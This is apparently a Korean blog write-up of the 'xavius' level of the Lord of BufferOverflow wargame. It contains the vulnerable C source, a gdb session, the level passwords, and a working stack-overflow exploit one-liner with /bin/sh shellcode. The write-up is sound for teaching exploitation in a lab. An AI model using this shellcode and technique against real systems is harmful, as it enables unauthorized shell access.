login : nightmare
password : beg for me
[nightmare@localhost nightmare]$ cat xavius.c
/*
The Lord of the BOF : The Fellowship of the BOF
- xavius
- arg
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
main()
{
char buffer[40];
char *ret_addr;
// overflow!
fgets(buffer, 256, stdin);
printf("%s\n", buffer);
if(*(buffer+47) == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(*(buffer+47) == '\x08')
{
printf("binary image retbayed you, too!!\n");
exit(0);
}
// check if the ret_addr is library function or not
memcpy(&ret_addr, buffer+44, 4);
while(memcmp(ret_addr, "\x90\x90", 2) != 0) // end point of function
{
if(*ret_addr == '\xc9'){ // leave
if(*(ret_addr+1) == '\xc3'){ // ret
printf("You cannot use library function!\n");
exit(0);
}
}
ret_addr++;
}
// stack destroyer
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40);
}
fgets함수를 유심히 지켜볼 필요가있다.
fgets함수에는 취약점이 존재한다.
우선 fgets는 256개를 받으니 A를 256개 넣어주기위해 파이썬으로 파일을 만들었다.
[nightmare@localhost nightmare]$ `python -c 'print"A"*256' > A
[nightmare@localhost nightmare]$ ls
A test xavius xavius.c
[nightmare@localhost nightmare]$ cat a
cat: a: No such file or directory
[nightmare@localhost nightmare]$ cat A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[nightmare@localhost nightmare]$ gdb test
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r < A
Starting program: /home/nightmare/test < A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x40077f72 in memcmp () from /lib/libc.so.6
gdb로 stdin을 분석해보자
일단 segmentation fault가 일어났다.
40015000부터 들어가는걸 볼수있다.
여기에 쉘코드를 넣어서 실행하면 될것같다.
\x10\x50\x01\x40으로 넣어주자
(python -c 'print "A" *44 + "\x10\x50\x01\x40" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"';cat)|./xavius
throw me away
'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글
| [Lord Of BufferOverFlow] 18번 succubus -> Nightmare (0) | 2021.03.07 |
|---|---|
| [Lord Of BufferOverFlow] 17번 zombie_assassin -> succubus (0) | 2021.03.06 |
| [Lord Of BufferOverFlow] 16번 assassin -> zombie_assassin (0) | 2021.03.06 |
| [Lord Of BufferOverFlow] 15번 giant -> assassin (0) | 2021.03.04 |
| [Lord Of BufferOverFlow] 14번 bugbear -> giant (0) | 2021.03.04 |
